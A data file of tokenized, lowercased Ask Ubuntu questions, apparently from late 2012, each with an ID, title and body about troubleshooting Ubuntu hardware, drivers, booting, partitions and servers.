215487	kernel driver not installed ( rc=-1908 )	run sudo apt-get install dkms properly installed ... also sudo / etc / init.d / vboxdrv setup but i jump sudo : / : command not found ... if i could help ... thanks
215498	how to install qualcomm atheros ar9565 wireless drivers ?	i purchased an hp laptop with the qualcomm atheros ar9565 ( qcwb335 ) wireless adapter . i understand that this adapter is currently not supported on ubuntu 12.04 and there is no way to get wireless access . i installed compat-wireless-3.6.6-1 ath9k driver and it did n't work , lshw -c network still showed *-network unclaimed after reset . how can i figure out when ubuntu will have driver for ar9565 ? is there a workaround to get wireless working somehow ?
215503	how to install the locate command ?	i wish to have the command locate in ubuntu 12.04 ( which is used for finding files . i believe there is such a command but i can not see it in ubuntu 12.04 is it part of any package ?
215505	how do you monitor the progress of dd ?	dd is a wonder allowing you to duplicate a hard drive to another , completely zero a hard drive , etc . but once you launch a dd command , there 's nothing to tell you of it 's progress . it just sits there at the cursor until the command finally finishes . so how does one monitor dd 's progress ?
215506	has anyone used ispconfig 3	i just upgraded to 12.04 and was contemplating on installing ispconfig3 and was wondering if anyone has used ispconfig3 and how does it perform . please and thank you in advance ... .
215507	`` sender address rejected '' error in evolution	i get this error when trying to send emails . it receives emails just fine , the reported error was : rcpt to `` receiver '' failed : `` sender '' : sender address rejected : not logged in '' . where `` receiver '' is the mail address i 'm trying to send and `` sender '' is my email address . please do not tell me i should just use thunderbird . i realize i can just use thunderbird i want to know how to make it work in evolution .
215508	screen turns off after inactivity	my screen turns off if i 'm inactive for some time , even though i disabled the setting . it happens on battery as well as on ac power . my brightness and lock settings : my power settings : does anybody what i forgot or how to fix this ? i already looked at this question , but i do n't want to use caffeine . edit i 've watched the problem for some time now and found that it is not really reproducible . it happens very seldomly by now , but when it happens i ca n't find out what it is triggered by . sometimes it 's on battery and sometimes not ( although i have the feeling it happens more often on battery ) . also the battery loading state does n't seem to have anything to do with it .
215510	organizing games launchers	on my kids account on the computer i kept installing a game and i locking them to the launcher on the left . after a while , the launcher got pretty swamped . my kids are not proficient enough to search for their games on the `` dash '' and also they do n't always are looking for a specific game , some times they just want to browse the installed games ... what can i do to so that if they want to play a game they will be presented with the list of installed games ?
215513	need open as administrator in nautilus	i 'm unable to get open as administrator option in nautils menu , i tried to follow many tutorials from different sites , but none of them are working .
215514	how can i get the sound indicator to show the track 's file name ?	i am using ubuntu 12.04 . i like how the sound indicator takes control of amarok , but i would like to change the display to only show the file name of the song that is playing , since my artist and title tags are foreign , and i really do n't care for the album image either . it would also be nice to get amarok 's titlebar to show the file name of the song , but my main concern right now is the sound indicator . so , how do i get all the unnecessary stuff off of my sound indicator ? thanks in advance for your help ! : ) here 's a screenshot to help explain what i 'm having an issue with . i would like the sound indicator to show the same thing as amarok 's playlist entry . screenshot :
215519	problem with ati graphics	i have a radeon hd5850 graphic card and when trying to install the proprietary drivers i get unity to start so i had to remove the fglrx driver and restore to the open driver . i tried again today to reinstall it again using another tutorial but the problem now is worse . when i turn on the computer , i can only get ubuntu in text mode , so i have to log on and use the `` startx '' command to get to the graphic mode however without unity . i tried some commands but i ca n't fix this , i do n't know if it can be the xorg.conf and i do n't know how to fix as i am new to ubuntu . can anyone help me to fix this please ? my version of ubuntu is 12.10 .
215523	ca n't get bumblebee to work on 12.10	i am trying to use bumblebee to get nvidia optimus to work on my on my laptop . it is a pavilion dv6 with a i7 and nvidia geforce gt 650m . however i am getting the [ error ] can not access secondary gpu - error : could not load gpu driver [ 1212.683168 ] [ error ] aborting because fallback start is disabled . i checked the wiki and tried trouble shooting by installing by installing linux-headers-3.5.0-17-generic but it was already installed . when i confider /etc/bumblebee/bumblebee.conf i get : [ 1981.812709 ] [ error ] the bumblebee daemon has not been started yet or the socket path /var/run/bumblebee.socket was incorrect . [ 1981.812803 ] [ error ] could not connect to bumblebee daemon - is it running ? i have also tried cheking for the the nouveau module but it was loading and re-installing bumblebee-nvidia and changing kerneldriver=nvidia but they did not help .
215525	pgagent installation in postgresql	i have installed postgresql 9.1 on ubuntu 12.04 64-bit . i try to run aplication stack builder and install pgagent . at first i am asked for root password , which i provide , after i choose postgresql 9.1 on port 5433 as the only option . on next screen i tick pgagent and click next a few times to get to the setup screen with verification the postgradesql installation details . the host is local , the user name is postgres and i type my password for postgrade which i use when open pgadmin iii . when i click next i have a warning : psql.bin : could not connect to server : connection refused is the server running on host `` localhost '' ( 127.0.0.1 ) and accepting tcp/ip connection on port 5432 ? when i try pgadmin it does work with password i provide but it looks for me like this password is not accepted by stack builder . i also provide my root password on the beginning so it should be able to do everything with sudo privilege . i do n't know what to do now and what is the problem . should i run something else before stack builder ? i know it seems like password problem but i tried all and it is not a simple password case . did anyone have similar problem or know what to do ?
215526	use laptop with external screen closing its cover	i have an hp pavilion dv6 with an nvidia geforce gt 230m running the privative driver version 304.43 and ubuntu 12.04 lts x64 . i am able to clone the screen and use `` extended desktop '' . the problem comes out when i try to use another screen ( not the laptop 's one ) and i close its cover . at this time the other screen turns black and when i reopen the laptop 's cover again the login screen appears on the external one . so my question is very simple : is there a way that allows you to work with an external screen closing your laptop 's cover ( as its screen has been already disabled via nvidia x server settings ) ? it is possible with windows , so i guess with ubuntu too : ) p.s . if i maintain the laptop 's cover opened it works fine , it 's just a matter of space ... thanks a lot !
215528	galaxy note ii mtp on ubuntu 12.04	i bought a branding new galaxy note ii and i tried to mount its storage to my ubuntu laptop . as you know , android 4.0+ uses mtp by default . android 4.1 does n't support usb mass storage anymore ! so i have to use mtp to open my files via usb . i followed this article to get it work . it worked only for external memory card . but the internal can not be reached ! $ mount /dev/sda3 on / type ext4 ( rw ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) /dev/sda5 on /media/islamics type fuseblk ( rw , noexec , nosuid , nodev , allow_other , blksize=4096 ) /dev/sda8 on /media/technology type fuseblk ( rw , noexec , nosuid , nodev , allow_other , blksize=4096 ) /dev/sda7 on /media/misc type fuseblk ( rw , noexec , nosuid , nodev , allow_other , blksize=4096 ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfs-fuse-daemon on /home/anass/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=anass ) gvfs-fuse-daemon on /root/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev ) mtpfs on /media/galaxynote2 type fuse.mtpfs ( rw , nosuid , nodev , allow_other , user=anass )
215531	is there a good and up-to-date stackexchange sites family app/widget for ubuntu 12.10 ?	i wanted to ask is there a good and up-to-date stack app/widget for ubuntu ( 12.10 ) to view stack sites or just to notifications or anything ?
215532	download file from web source , selectively	if anyone has heard of bukkit , you know that their files are usually of three types : development , beta , and realease . click ( here ) for examples . i need a script that : loops through the directory gets the latest stable version ( probably just as simple as looking at the version number as they have a simple naming convention , each stable version is succeeded by -rx.0 , while developmental and beta versions are succeeded by -rx.x ) after that i know i 'll need to use wget to download the file . note : if your just going to post code , at least tell me what it does so i can use it later if i need to
215539	unable to mount usbdrive error creating moint point : permission denied	whenever i plug a usb into my computer a window pops up and says unable to mount [ name of usb ] error creating moint point : permission denied steve @ goliath : / $ uname -a linux goliath 3.2.0-32-generic # 51-ubuntu smp wed sep 26 21:33:09 utc 2012 x86_64 x86_64 x86_64 gnu/linux steve @ goliath : / $ sudo fdisk -l warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 120.0 gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders , total 234441648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0f716ee1 device boot start end blocks id system /dev/sda1 1 234441647 117220823+ ee gpt warning : gpt ( guid partition table ) detected on '/dev/sdb ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdb : 1500.3 gb , 1500301910016 bytes 255 heads , 63 sectors/track , 182401 cylinders , total 2930277168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0f710ee1 device boot start end blocks id system /dev/sdb1 1 2930277167 1465138583+ ee gpt disk /dev/sdc : 16.0 gb , 16005464064 bytes 74 heads , 10 sectors/track , 42244 cylinders , total 31260672 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc3072e18 device boot start end blocks id system /dev/sdc1 8064 31260671 15626304 c w95 fat32 ( lba ) steve @ goliath : / $ sudo mkdir /media/external mkdir : can not create directory `/media/external ' : permission denied steve @ goliath : / $ sudo mkdir /media/usb0 mkdir : can not create directory `/media/usb0 ' : permission denied steve @ goliath : / $ sudo ls -l / | grep media drwxr-xr-x 3 root root 4096 oct 3 22:48 media steve @ goliath : / $ ls /media/ -a . .. mediashare mediashare is the the directory on my server that has all my movies and music . if there is any information i left out please let me know . how can something not be accessed by sudo/root ? i have tried sudo su and the above .
215541	i ca n't boot into ubuntu `` try ( hd0,0 ) : ntfs5 : no ang0 '' error message	i recently installed ubuntu 12.04 alongside windows 7 . it was working fine but now when i try to boot with ubuntu after the operating system choice screen i get this . boot error message try ( hd0,0 ) : nfts5 : no ang0 try ( hd0,1 ) : ntfs5 : no ang0 try ( hd0,2 ) : ntfs5 : no ang0 try ( hd0,3 ) : extended : try ( hd0,4 ) : ntfs5 : no ang0 try ( hd0,5 ) : extended : try ( hd0,5 ) : ext2 : and when i press ctrl+alt+del it restarts the computer and if i chose to boot with ubuntu same thing happens again . but windows works fine.. how do i resolve this problem ? thanks .
215542	showing the correct font in japanese	i 'm having a problem with japanese characters using old/chinese forms ( çľç¤ž being the obvious examples ) , just as in this question : some applications use `` archaic '' character instead of modern japanese one . i 'm using ubuntu 12.10 and the solutions there do n't seem to apply anymore . how do you fix it in ubuntu 12.10 ?
215543	what do the updates provide in the nexus 7 desktop installer ?	is there any advantage in re-installing to nexus 7 , with an updated 'ubuntu nexus 7 desktop installer ' which has itself been updated recently ? presumably it has added support for 32gb model .. does it give you any further updates than can not be achieved on the device itself ? eg . by typing : sudo apt-get dist-upgrade
215544	how can i create a 4tb partition on my software raid5 device ?	i have set up a raid5 device with three 2tb hard drives using mdadm . the device was successfully created , but i can not seem to create a partition on the device . when i try to make an ext3 or ext4 partition via disk utility , i get the following error error creating partition : helper exited with exit code 1 : in part_add_partition : device_file=/dev/md0 , start=0 , size=4000526106624 , type= entering ms-dos parser ( offset=0 , size=4000526106624 ) msdos_magic found found partition type 0xee = > protective mbr for gpt exiting ms-dos parser entering efi gpt parser gpt magic found partition_entry_lba=2 num_entries=128 size_of_entry=128 leaving efi gpt parser efi gpt partition table detected containing partition table scheme = 3 got it got disk new partition guid '' is not valid type '' for gpt appear to be malformed i have seen this question , but that seems to suggest using gparted to do the partitioning . i 'm fine with doing that , but my raid device does n't show up in the list of gparted devices . i suspect because this is a raid and not a regular disk . i have already created a gpt partition table on the device . how can i add a partition to my device ?
215551	how do i get back the unity login screen after installing gnome-core ?	i installed gnome-core and now i have an ugly login screen . i want to reset or delete gnome-core and re-install the unity login screen , or just switch back to lightdm . is there any way to do it easily and quickly ?
215552	how do i run teamviewer in a headless system ?	i 'm really new to ubuntu 12.04 and i 've been trying to get remote desktop services between me and my server . i do n't have any spare monitors , keyboards or mice . i did connect said items too the server and got teamviewer running and connected , but i ca n't use those components every time i want to go remote desktop . i have ssh but i want a gui on hand for annoying stressful situations . i read somewhere that ubuntu does n't start a gui if there is no monitor connected , and tried those xorg.conf setups to no avail . i believe this is the reason why my headless setup is n't working . how can i get my gui to startup while headless ?
215554	why do i have to have capslock permanently on	initially , i believed this was on openoffice problem but abiword and , indeed , gedit , display the same problem , so it must be an ubuntu glitch . i was typing a document and used capslock when creating a title . now , when i turn capslock off , everything is in caps - when i turn it on , everything is in lower case . i can cope with this if i leave capslock on permanently but this is not what is supposed to happen . capslock off = no caps ( or should do ! ) . can anybody help with this ? i 've searched around this forum but , not being much of a forum user , i was unable to find a solution . it 's entirely possible that i had a 'finger-fit ' and hit a combo of buttons which included capslock but i do n't remember doing that . i 'm running ubuntu netbook edition 10.04 on an hp intel pc . if you need any more system specific stuff , just shout . thanks , patrick p.s . as a quick addendum to this item , the situation does n't survive a reboot . all is again normal when the pc is restarted - i just do n't want to have to reboot every time it happens . i 'd get nothing done ! p.m .
215556	tell the kernel to strongly cache a particular directory	this question is a rephrasing of optimizing ext4 performance . i have a directory that contains build files , most very small , but totaling 5.6g . i usually access the same subset of files ( some thousands , for some tens of megabytes ) over and over again . the subset changes daily ( different projects , different versions of libraries ) . what takes longer when i use it seem to be disk seeks . for example if i do a du twice the second time it takes as much time as the first , and disk activity is similar . ideally i 'd like to tell the kernel to allocate x mb to the metadata and y to data in the folder , like the options for nfs cache . is it possible in some way , other than mounting nfs from localhost and caching it to a ramdisk ?
215558	how i can see my shares from remote through internet	i have many shares in many different computers with ubuntu , windows and android . i have already installed samba and it 's working properly . all the shares i could access either from ubuntu , android or windows . but all i could do within from my own network . is there any way , so i could see all of my shares from remote , through internet ? may be with any commands or using any browser ? pls help me in this issue . thanking you in advance . raihan
215559	laptop does not boot from usb memory at all	i put usb in the boot order first and i tried to select it from the boot menu , but it boots only from hdd every time . i have an usb3 stick 32 gb and created t a bootable stick with startup disk creator under ubuntu 11.10 . does anyone out there know what 's going wrong ? any help is greatly appreciated ! ! thank you all , stefan
215561	how to prevent nautilus panes from resizing automatically ?	the `` extra pane '' ( f3 ) view in nautilus automatically resizes in a couple situations . is there a way to turn this off so they each stay at 50 % ? the two situations are when there 's one tab on one side and more than one are opened on the other , or when a directory for an external device which contains pictures is opened in one pane . ubuntu 12.04 64bit
215564	no such partition , grub rescue	i am currently dual booting win7 and ubuntu . i created a new partition , on my c drive , to install windows 8 on ( i did not want to do the upgrade ) . i inserted the windows 8 cd and restarted my computer . no such partition/ grub rescue is all that comes up now . i loaded ubuntu from disk and did boot-repair . it did not solve my problem but i got the following output please let me know if anyone can fix this . i am lost .
215565	full hdd capacity not recognised on new additional disk	i 've added a new 3tb hdd to my ubuntu server 12.04 system for media ( already has another drive for the os ) , but it 's only showing 2.2tb capacity df -h gives /dev/sdb1 2.2t 208m 2.2t 1 % /media/hd1 and fdisk -l gives disk /dev/sdb : 3000.6 gb , 3000592982016 bytes 90 heads , 3 sectors/track , 21705678 cylinders , total 5860533168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x29fbcbef device boot start end blocks id system /dev/sdb1 2048 4294967294 2147482623+ 83 linux and lshw gives *-disk:1 description : ata disk product : wdc wd30ezrx-00m vendor : western digital physical id : 1 bus info : scsi @ 1:0.0.0 logical name : /dev/sdb version : 80.0 serial : wd-wcawz2859923 size : 2794gib ( 3tb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=29fbcbef *-volume description : ext4 volume vendor : linux physical id : 1 bus info : scsi @ 1:0.0.0,1 logical name : /dev/sdb1 logical name : /media/hd1 version : 1.0 serial : dbb920f9-989b-4494-957f-23a6b758030b size : 2047gib capacity : 2047gib capabilities : primary journaled extended_attributes large_files huge_files dir_nlink recover extents ext4 ext2 initialized configuration : created=2012-11-10 22:21:07 filesystem=ext4 lastmountpoint=/media/hd1 modified=2012-11-10 23:27:27 mount.fstype=ext4 mount.options=rw , relatime , user_xattr , barrier=1 , data=ordered mounted=2012-11-10 23:14:02 state=mounted i followed the instructions on https : //help.ubuntu.com/community/installinganewharddrive ( command line ) to partition , format and mount the drive . i 'm not sure what i 've done wrong , any ideas ? p.s . fdisk -l also states warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . not sure if that makes a difference ?
215572	wireless not connecting ( or detecting ) before actually installing ubuntu on macbook pro	today i was attempting to install ubuntu on my macbook as a separate partition . i was able to get ubuntu ready to install via a dvd , but i encountered a problem once i actually wanted to begin installing : ubuntu wo n't connect to my wireless internet ( it only gives me an option to connect to wired ) and it does n't detect it either for all i know . so therefore i have 2 questions : how can i enable wireless before installing ubuntu in order for everything to work ? could i install ubuntu without internet connection and then fix the problem ( and install updates ) later on , or would that just cause trouble ? all help is massively apprecitated !
215576	how to share wifi through ethernet cable to windows pc ?	i am right now using ubuntu 12.04 64bit , i have a small ethernet net cable . i read somewhere that you can share your wifi from ubuntu to other pc by some editing in network settings . here is what i tried ( http : //blog.arvixe.com/how-to-share-wireless-connection-via-ethernet-cable-in-ubuntu-to-any-device/ ) i tried it and it even showed the light beeping in both sides btw my other pc has windows 7 64bit . and on there it just did n't connect . it just showed `` identifying ... '' and `` no internet connections ''
215578	mts mblaze in ubuntu 12.10	how to let ubuntu auto detect a mts mblaze usb modem without having to restart ubuntu . every time i plug in , i would only have to restart my ubuntu to make the modem work . i have also tried restarting some services such networking , network-interface & network-manager . please provide a solution to make detect the usb modem without having to restart the entire operating system .
215584	can i view nvidia gpu usage ?	i know that i can view cpu usage using system monitor : is there such a tool for viewing gpu usage , as well ?
215585	unable to login after killing gnome-session	i was explaining to a friend that the graphical interface in linux is a separate program that can be killed like any other . to demonstrate that i switched to tty1 and tried to kill the gui ( as a real-life scenario of when the gui freezes or crashes ) . i was n't sure what process exactly should i kill so i picked randomly to kill gnome-session ( was n't sure what exactly to kill : gnome , unity , x11 ? ) : sudo killall gnome-session immediately after execution , the session was automatically switched to tty7 in the login screen , as it seemed to restarted the gui ( and my friend was so impressed at this point ! ) . the problem is , when i tried to login , i could n't ! after entering the password the login screen disappears for a moment and then reloads again . i can login normally from any other tty , and can successfully login from the login screen as any other user and i can start a guest session . it is that only specific user that can not login via the login screen . i tried to start gnome-session from any other tty but it fails ( can not open display ) , and i did reboot the machine several times . what is the error and how can i trace it and fix it ? i am running ubuntu 12.04.1 lts , kernel 3.2.0-32-generic . edit : tried unity -- replace in tty1 : warning : no display variable set , setting it to :0 no protocol specified no protocol specified compiz ( core ) - fatal : could n't open display :0 and nothing changed , still ca n't login via that user . edit : i did reinstall gdm , lightdm , gnome-session , and unity ... nothing changed ! edit : and went all the way down of reinstalling gnome . still nothing changed ( except the grup splash image of debian ! ! ! ) .
215588	upgrade installation interrupted , and system hangs on login	this problem started after upgrading from ubuntu 12.04 to 12.10 . i just used the upgrade option from the update manager . once , there was a connection failure . and it quit , but told me that all downloaded packages have been kept . then a while later , after connection resumed , i started again . it all got over , and it finished upgrading , and then it said `` restarting the computer '' . then it went into the ubuntu restart/start-load screen and hung there forever . i powered off the laptop , and restarted the laptop . then after the start screen , the login screen loaded , which was sort of in a stretched 800x600 res . i log in , and i do n't see anything at all except the wallpaper . no other component of the interface has loaded . need a fix or a safe way out . i do n't even mind rolling back to 12.04 with just all my files intact .
215589	can not mount /dev/loop1 on /cow	i am trying to install ubuntu 12.10 64bit using a liveusb and i got this message : can not mount /dev/loop1 on /cow which shows up after clicking on `` try ubuntu before installing '' or install ubuntu '' . i tried using nomodeset option and i ended up with this error : initramfs ) unable to find a medium containing a live file system i used startup disk creator
215599	i 'm getting an error with nginx , php and wordpress - 502 bad gateway	using the sample recipe i am deploying a wordpress solution on ec2 : juju bootstrap -- constraints `` instance-type=t1.micro '' juju set-constraints instance-type=t1.micro juju debug-log juju deploy mysql wordpress-db juju deploy wordpress juju add-relation wordpress wordpress-db juju expose wordpress after this i point my browser to the public url and get the error : 502 bad gateway nginx/1.1.19 looking at the debug log i see this error : 2012-11-10 20:08:19,083 unit : wordpress/0 : hook.output info : * restarting php5 fastcgi process manager php5-fpm 2012-11-10 20:08:20,267 unit : wordpress/0 : hook.output info : ... fail ! sshing to the wordpress box , i tried restarting the php service but i get a seg fault : ubuntu @ ip-10-194-31-77 : ~ $ sudo /etc/init.d/php5-fpm start segmentation fault ( core dumped ) anybody know the issue ? is there a problem with the php version and wordpress ?
215603	ubuntu 12.10 does n't boot , hp dv4	i installed the latest version of ubuntu without windows 7 ( i erased the partition and installed ubuntu on it ) . after i installed ubuntu , i restarted my computer and then it could n't start . it gets stuck in the hp logo and i ca n't do anything else , what can a do ?
215607	check what process was causing the problem of high cpu load	i 'm running nginx wordpress server in kvm using 12.04 server x86 . it was running very well about 4 month until 2 hours ago . i found that my website is down and no ping response . virt-manager logged high cpu load ( plz see the picture below ) before unexpected shut down . i want to know what process caused unexpected shutdown . the following log files make me think my server is attacked . any suggestions and help would be appreciated . kern.log and syslog showed me same output . nov 11 03:54:11 www kernel : [ 1344541.156239 ] [ ufw block ] in=eth0 out= mac= src=0.0.0.0 dst=224.0 . 0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 nov 11 03:54:11 www kernel : [ 1344541.156315 ] [ ufw block ] in=eth0 out= mac= src=0101:080a:2334 : c90 0:0100:0000:0000:0000 dst=ff02:0000:0000:0000:0000:0000:0000:0001 len=72 tc=0 hoplimit=1 flowlbl=0 proto=icmpv6 type=130 code=0 /nginx/access.log showed me 119.235.237.17 - - [ 11/nov/2012:03:45:29 +0900 ] `` get /blog http/1.1 '' 200 30493 `` - '' `` yeti/1.0 ( nhn corp. ; http : //help.naver.com/robots/ ) '' my-server-ip - - [ 11/nov/2012:11:05:30 +0900 ] `` post /wp-cron.php ? doing_wp_cron=13 http/1.0 '' 499 0 `` - '' `` wordpress/3.4.2 ; http : //mywebsite.com '' server turned on in here . 119.235.237.16 - - [ 11/nov/2012:11:05:30 +0900 ] `` get /blog http/1.1 '' 200 32935 `` - '' `` yeti/1.0 ( nhn corp. ; http : //help.naver.com/robots/ ) ''
215608	kicked out when logged in ?	when i log into ubuntu the screen goes black as it were logging in but then i am back in the login screen . i can login as guest ( i should disable that ) . i can login via ssh . the last time i had no issues was when i used it this morning and the only unusual thing i did was shutdown via ssh ( i think i wrote shutdown now ) which had ubuntu hang after showing the shuting down screen for many seconds ( i kind of assumed it shut down properly since the ui froze as well and it usually takes less time ) . whats the easiest way to fix this w/o reinstalling ? its a brand new install and so it probably takes me 10mins to recopy/setup everything so i may just do that -edit- using 12.04
215609	how do i set up line out/in and mic ports for surround sound ?	i am running ubuntu 12.10 on a sony vaio vgc-rb34g ( http : //reviews.cnet.com/desktops/sony-vaio-vgc-rb34g/4505-3118_7-31289053.html ) with an integrated realtek high definition audio sound card . on windows , i can set up the sound card to provide sound to my surround sound system from the line out , line in , and mic ports , as in all of these are producing audio . i have tried to use alsa to achieve this result with no luck . is there any possible way to do this on ubuntu ? thanks ! here is a picture of the manager i have on windows and the result i want to achieve :
215611	can i use ubuntu one icons for 3rd party thingy ?	so i am wondering what the guide lines are for using ubuntu one icons as i have heard from a number of people that ubuntu one has some propitiatory things to it . so i am not sure if i am to use there logo in something like this http : //bazaar.launchpad.net/~josephjamesmills/ubuntutv/fan_art/download/josephjamesmills % 40gmail.com-20120728145710-sy00cvq1ja8o9qad/ubuntuoneactive.png-20120728145613-jtjdupswpqiocpb2-266/ubuntuone-active.png if that is ok ? i know that this might be a silly question but i do not want to get myself in trouble.thanks so much for reading this and helping me with a project that helps others ; )
215614	bios always freezes instantly	i 'm not sure if this is necessarily a ubuntu question , but i 've only had the problem since i installed 12.10 . when i turn my computer on , the bios screen comes up as usual and ... nothing else . when i press any key , i hear a loud beep and there 's no response . i 've tried looking for similar problems , but in most cases people are at least able to interact with their bios even if their os does n't load . it seems as though it 's just completely freezing as soon as i turn it on .
215618	universal usb installer not working	everytime i try to use the usb installer , i select the .iso file and it starts working , and i keep getting errors ( files not found , etc . ) i tried it with two different flash drives and tried redownloading the iso file . am i doing something wrong ?
215619	boot problem in asus eee pc 1015cx	i am a newbie to linux world , although i have previously worked on ubuntu 11.04 for daily use ( net access and simple recordings using audacity ) . i am not sure , at what level i stand as a newbie . i bought this asus eee pc two days back . the model is asus 1015cx . see the specs here . i created a live usb to install 12.10 . the usb booted fine . when i clicked `` try ubuntu '' option , it showed me a black screen with a cursor blinking . i waited for 15 minutes and had to restart using the power button . on clicking the `` install ubuntu '' button , the install process went seamlessly . [ i have a windows7 installed on one of the partitions ] . i installed it alongside previous windows installation . the system was then rebooted for the first time . it showed the grub menu and i selected the first option ubuntu . after showing the splash screen for a second , it began showing various messages on a black screen and then it struck on `` stopping save kernel state message '' . i had to force shutdown the system using power button . sometimes it just gives a blank screen with a cursor blinking and on pressing power button , some messages stating that acpid is doing something and stopping services pops up and the system shuts down . i tried booting with nomodeset and other parameters as directed in solution to previous such problems on forums . also ctrl+alt+f1 , f2 , f3 , ... , f12 is not doing anything for me anywhere . at installation , i checked login automatically option . on booting into recovery several options comes up . clicking resume just gives me a blank screen with cursor blinking . on dropping to root shell and remounting filesystem as rw , i am able to supply some command that worked for others . startx -- > several messages comes up with last one stating fatal error : no screen found sudo service lightdm start -- > gives a blank screen with a cursor blinking lspci | grep vga -- > shows some intel integrated graphic ... something i do n't remember i had reconfigured xserver-xorg , lightdm , reinstalled ubuntu-desktop , unity . what should i do.. ? ? will going back to 11.04 work.. ? ? or i should leave all hopes of running ubuntu on my netbook .
215620	my ethernet connection is not working but it is detected by my computer	i 'm setting up an old computer with ubuntu server 12.04 . i wiped the drive and went through the installation fine but afterwards the ethernet would not work . it 's physically connected to the router and the card is recognized by lspci ( sis 900 ) but it wo n't connect at all . i 've plugged in and installed the drivers for a wifi adapter and it 's worked with the same router . just so you know i 've turned it on and off plenty of times . any help would be appreciated .
215623	folder items not showing ?	after copying some files via network from other shared computer folder 's files ( videos ) , files are not showing but it consumed the size . and you know how to solve it , right ? after doing that it said . what will i do i do ? withi these . ls : can not access one piece 352.mkv : input/output error ls : can not access one piece 353.mkv : input/output error ls : can not access one piece 354.mkv : input/output error total 2290096 drwxrwxrwx 1 root root 20480 nov 10 22:29 . drwxrwxrwx 1 root root 4096 nov 10 22:04 .. -rwxrwxrwx 1 root root 62813496 jul 5 2011 one piece 351.mkv - ? ? ? ? ? ? ? ? ? ? ? ? ? ? one piece 352.mkv - ? ? ? ? ? ? ? ? ? ? ? ? ? ? one piece 353.mkv - ? ? ? ? ? ? ? ? ? ? ? ? ? ? one piece 354.mkv -rwxrwxrwx 1 root root 62844148 jul 6 2011 one piece 355.mkv -rwxrwxrwx 1 root root 69234398 jul 6 2011 one piece 356.mkv -rwxrwxrwx 1 root root 62845183 jul 5 2011 one piece 357.mkv -rwxrwxrwx 1 root root 62827963 jul 5 2011 one piece 358.mkv -rwxrwxrwx 1 root root 62838780 jul 5 2011 one piece 359.mkv -rwxrwxrwx 1 root root 62837104 jul 5 2011 one piece 360.mkv -rwxrwxrwx 1 root root 62813792 jul 5 2011 one piece 361.mkv -rwxrwxrwx 1 root root 62842042 jul 5 2011 one piece 362.mkv -rwxrwxrwx 1 root root 62843543 jul 6 2011 one piece 363.mkv -rwxrwxrwx 1 root root 62832558 jul 5 2011 one piece 364.mkv -rwxrwxrwx 1 root root 62820286 jul 5 2011 one piece 365.mkv -rwxrwxrwx 1 root root 62846936 jul 6 2011 one piece 366.mkv -rwxrwxrwx 1 root root 62837075 jul 5 2011 one piece 367.mkv -rwxrwxrwx 1 root root 62851209 jul 6 2011 one piece 368.mkv -rwxrwxrwx 1 root root 62837409 jul 5 2011 one piece 369.mkv -rwxrwxrwx 1 root root 62812522 jul 5 2011 one piece 370.mkv -rwxrwxrwx 1 root root 62851644 jul 5 2011 one piece 371.mkv -rwxrwxrwx 1 root root 62838500 jul 5 2011 one piece 372.mkv -rwxrwxrwx 1 root root 62370747 jul 6 2011 one piece 373.mkv -rwxrwxrwx 1 root root 62480550 jul 5 2011 one piece 374.mkv -rwxrwxrwx 1 root root 62371425 jul 5 2011 one piece 375.mkv -rwxrwxrwx 1 root root 62413653 jul 5 2011 one piece 376.mkv -rwxrwxrwx 1 root root 62287449 jul 5 2011 one piece 377.mkv -rwxrwxrwx 1 root root 62284548 jul 6 2011 one piece 378.mkv -rwxrwxrwx 1 root root 62448127 jul 5 2011 one piece 379.mkv -rwxrwxrwx 1 root root 62434587 jul 5 2011 one piece 380.mkv -rwxrwxrwx 1 root root 62275388 jul 5 2011 one piece 381.mkv -rwxrwxrwx 1 root root 62294947 jul 5 2011 one piece 382.mkv -rwxrwxrwx 1 root root 66761802 jul 4 2011 one piece 383.mkv -rwxrwxrwx 1 root root 62303555 jul 5 2011 one piece 384.mkv -rwxrwxrwx 1 root root 62358213 jul 5 2011 one piece 385.mkv -rwxrwxrwx 1 root root 66140516 jul 4 2011 one piece 386.mkv -rwxrwxrwx 1 root root 65891269 jul 5 2011 one piece 387.mkv -rwxrwxrwx 1 root root 65912631 jul 3 2011 one piece 388.mkv -rwxrwxrwx 1 root root 65694129 jul 5 2011 one piece 389.mkv -rwxrwxrwx 1 root root 65970090 jul 4 2011 one piece 390.mkv
